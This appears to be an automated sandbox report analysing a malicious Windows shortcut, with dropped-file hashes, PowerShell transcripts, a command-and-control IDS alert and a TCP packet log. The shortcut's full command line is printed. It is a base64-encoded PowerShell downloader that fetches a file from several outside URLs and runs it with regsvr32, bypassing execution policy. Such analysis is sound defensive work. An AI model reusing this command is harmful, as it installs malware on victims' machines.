                                                                                                                                                                                  Preview:...................................FL..................F. .. .......3...v.$.Y..":.#.Y..r............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......N....-..@$s..3...;.$.Y....|.2.r....T. .2022-0~1.LNK..`......hT...T.....h......................0.2.0.2.2.-.0.4.-.2.6._.1.0.4.5...e.x.e...l.n.k.......]...............-.......\...........'........C:\Users\user\Desktop\2022-04-26_1045.exe.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......305090...........!a..%.H.VZAj................-..!a..%.H.VZAj................-........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N......#/O9....#N......@...........................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T...........................M...W.i.n.d.o.w.s.....Z.1.....hT...System32..B......L...T...........................(.,.S.y.s.t.e.m.

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ABKRTGA0H3GHLAHU2CSG.temp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4519
                                                                                                                                                                                  Entropy (8bit):3.8167704602295203
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:OBrEF5pQjpLvQInJor8O4SogZoV1onJor8O4SogZoVxH:grEFgFLv9n+hHqWn+hHqx
                                                                                                                                                                                  MD5:0CED9A53B0923DFB36595D89FD519B97
                                                                                                                                                                                  SHA1:8F9E88294C1D2EB741FD28B687AB5B98218CA315
                                                                                                                                                                                  SHA-256:7763B99548C0DDCDC2F70E6019357460E85E3945A62E48E09540CA3DE87525E9
                                                                                                                                                                                  SHA-512:F37950D321569EFE0DEF40D0F01F9320FAB742D68BFDFA1AD7D7A7758B5C4430022D2A87CF0760AD0ECB953D446E0E26A67C1E0A2F8AD52704D47ADC9A3A07ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...................................FL..................F. .. .......3...v.$.Y..":.#.Y..r............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......N....-..@$s..3...;.$.Y....|.2.r....T. .2022-0~1.LNK..`......hT...T.....h......................0.2.0.2.2.-.0.4.-.2.6._.1.0.4.5...e.x.e...l.n.k.......]...............-.......\...........'........C:\Users\user\Desktop\2022-04-26_1045.exe.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......305090...........!a..%.H.VZAj................-..!a..%.H.VZAj................-........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N......#/O9....#N......@...........................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T...........................M...W.i.n.d.o.w.s.....Z.1.....hT...System32..B......L...T...........................(.,.S.y.s.t.e.m.

                                                                                                                                                                                  C:\Users\user\Documents\20220426\PowerShell_transcript.305090.2n11L_xm.20220426094619.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1034
                                                                                                                                                                                  Entropy (8bit):5.177821664767542
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BxSAbxvBn/nx2DOXUWEgqWiHjeTKKjX4CIym1ZJXBNunxSAZy:BZVvhfoOkgtiqDYB1ZzNAZZy
                                                                                                                                                                                  MD5:12F0D6299102693ED963B68B41611A8B
                                                                                                                                                                                  SHA1:FB48D6D17661A9F203E823D142493D2B8D1C51C2
                                                                                                                                                                                  SHA-256:B0D86992BC8C3FF5320593454CD0DFF86E9A0C5A07F9C838E4EAE35F0982A825
                                                                                                                                                                                  SHA-512:95D771F7EA6CE95F82FAF5B6AAE47D19AA71710BB2C95BF316D584ECCC1C4FF62A956974EE0CCFB46A26D51049EAB7408D9FFDF9E21DE0FCC8C8CF4DED8DB786
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426094620..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1..Process ID: 6624..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220426094620..**********************..PS>CommandInvocation(ezMgZunnfF.ps1): "ezMgZunnfF.ps1"..**********************..Command start time: 20220426095140..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 202204

                                                                                                                                                                                  C:\Users\user\Documents\20220426\PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3613
                                                                                                                                                                                  Entropy (8bit):5.858450296755712
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:BZrhfNm3JPTcJ+62qDo1Z63JPTcJ+6SygPaIZ0i:kJPTcJhRJPTcJhNgz
                                                                                                                                                                                  MD5:2460B1C0E90B9D289A12F6E4387868C7
                                                                                                                                                                                  SHA1:2334132A2276ACD2B5BFB2205A209FED212219A5
                                                                                                                                                                                  SHA-256:165DDEE0C89E7749E73670EF579DA84896FC18D7ECF641B9019D37EFF3C5300F
                                                                                                                                                                                  SHA-512:71F5001D198E5EEC4810282DD97AC25A223ACB4A28AA30F55F747496049EB87A992327F871E027FA67AB8716706082F60A6C76A1A201592B4557511273F244BD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426094617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command Out-String -InputObject 2022-04-26_1045.lnk | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9

                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):9062
                                                                                                                                                                                  Entropy (8bit):3.164892090251247
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zw+w:j+s+v+b+P+m+0+Q+q+n+w
                                                                                                                                                                                  MD5:A18C5385825C988E5CCDF369D7BD5C91
                                                                                                                                                                                  SHA1:D2416A55A4846E0120AED4C1BF9A7E48D1DABB57
                                                                                                                                                                                  SHA-256:8A815FD462F1628AD305028A2937AC3FCBB84E395DB91381ADED5E532A86F406
                                                                                                                                                                                  SHA-512:FF0E70003C70DBB608A21BE5048FF72F4FC409921CFFFD89F963FB7E86BB115EB8A2436B7073E6D9B18FB41AC62660C27A88F74A8CD3D5EAD004EC63869FFBB9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                                                                                                                                  C:\Windows\System32\Atpvfjzdexae\enxldhj.oxc (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):473088
                                                                                                                                                                                  Entropy (8bit):6.839342414681294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:cYI/EvSkO2GGIBaUPPGJc1jExt+9NuI6I78:RI/EoxBaQZExt+9Nu
                                                                                                                                                                                  MD5:63935105CF001C980B664DB3BEB124FB
                                                                                                                                                                                  SHA1:A44DF97A8AA1EDEA9713A5B9B4BEF3B3BB2ECA6A
                                                                                                                                                                                  SHA-256:2D583F9460C8224531E69BF226AAA55D983898082B59BC1995CABBB486572CA7
                                                                                                                                                                                  SHA-512:FFAE8AFA0CC192228E65A31D69A2F07CAFFFBCF8D72D79C4581AC43468DB7AB1E4F2289707E3C50D90D9D722337516D624AF264990C141B2D21D67620F2C5205
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.u.,.&.,.&.,.&...&.,.&...&.,.&.,.&...&.~.&D,.&.~.&.,.&.~.&K,.&.~.&.,.&.~.&.,.&.~.&.,.&Rich.,.&........................PE..d...2.gb.........." .........:..........................................................................................................O...............L........3..........................................................................x...@....................text...|........................... ..`.rdata..............................@..@.data............,..................@....pdata...3.......4...*..............@..@.rsrc...L............^..............@..@.reloc..j).......*..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=134, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                                                                                                                                                  Entropy (8bit):3.8003701847521434
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                  File name:2022-04-26_1045.exe.lnk
                                                                                                                                                                                  File size:2930
                                                                                                                                                                                  MD5:a4e45d28631ea2dd178f314f1362f213
                                                                                                                                                                                  SHA1:ae71fe52df0fa3762866eeb6fb4829cc7c6877ce
                                                                                                                                                                                  SHA256:0110ac3095c40757e96ec0d66c639cdbdb7c1247eed0ed79281820423f164992
                                                                                                                                                                                  SHA512:385d09d557b4bb28c03ef647af368fc9107612e89540ba59abdbc69e3a23e7f02cd0f2b8e95203b32f0a8c50e84e741c9a87e68f9209bccd4e73b655ccf2ed04
                                                                                                                                                                                  SSDEEP:48:8n5awp7dXjrxFZTWsaHDFKLUcIhAOnPO3Crc9fBj4ab:8n5xdjnS/OyrEfBj4
                                                                                                                                                                                  TLSH:5A518C282AEA1218FAF3DF3168E53545DD67BC92A9319A8E008D474A1723640ED95F3E
                                                                                                                                                                                  File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:fc3cf4c4dcd9d9ed

                                                                                                                                                                                  Static Windows Shortcut Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Relative Path:
                                                                                                                                                                                  Command Line Argument:-command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "%tmp%\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "%tmp%\ezMgZunnfF.ps1"; Remove-Item "%tmp%\ezMgZunnfF.ps1"
                                                                                                                                                                                  Icon location:shell32.dll

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                  04/26/22-09:46:56.833835 04/26/22-09:46:56.833835TCP2404310ET CNC Feodo Tracker Reported CnC Server TCP group 6497568080192.168.2.3138.201.142.73

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Apr 26, 2022 09:46:22.751005888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.005525112 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.005657911 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.079543114 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.333266973 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356245995 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356312990 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356355906 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356398106 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356435061 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356453896 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356478930 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356539011 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356578112 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356580973 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356618881 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356658936 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356662989 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356709957 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356762886 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356806993 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356863976 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356910944 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356959105 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356959105 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356977940 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356995106 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357013941 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357031107 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357033014 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357055902 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357096910 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357098103 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357117891 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357136965 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357153893 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357167959 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357192993 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357201099 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357220888 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357248068 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357258081 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357276917 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357296944 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357315063 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357332945 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357351065 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357368946 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357368946 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357383966 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357423067 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357486963 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357508898 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357547045 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357566118 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357580900 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357604980 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357625008 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357700109 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357755899 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357770920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.357832909 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.432987928 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.612996101 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613023996 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613044024 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613060951 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613080025 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613096952 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613111973 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613112926 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613162994 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613200903 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613219023 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613234997 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613251925 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613255024 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613270998 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613289118 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613303900 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613337994 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613518000 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613537073 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613553047 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613562107 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613594055 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613634109 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613651991 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613668919 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613708019 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613713026 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613751888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613784075 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613801956 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613821030 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613837004 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613850117 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613854885 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613883972 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613914967 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613960981 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613966942 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614001989 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614042997 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614099979 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614118099 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614176989 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614197016 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614214897 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614233017 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614254951 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614272118 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614312887 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614322901 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614409924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614448071 CEST8049747166.62.28.147192.168.2.3
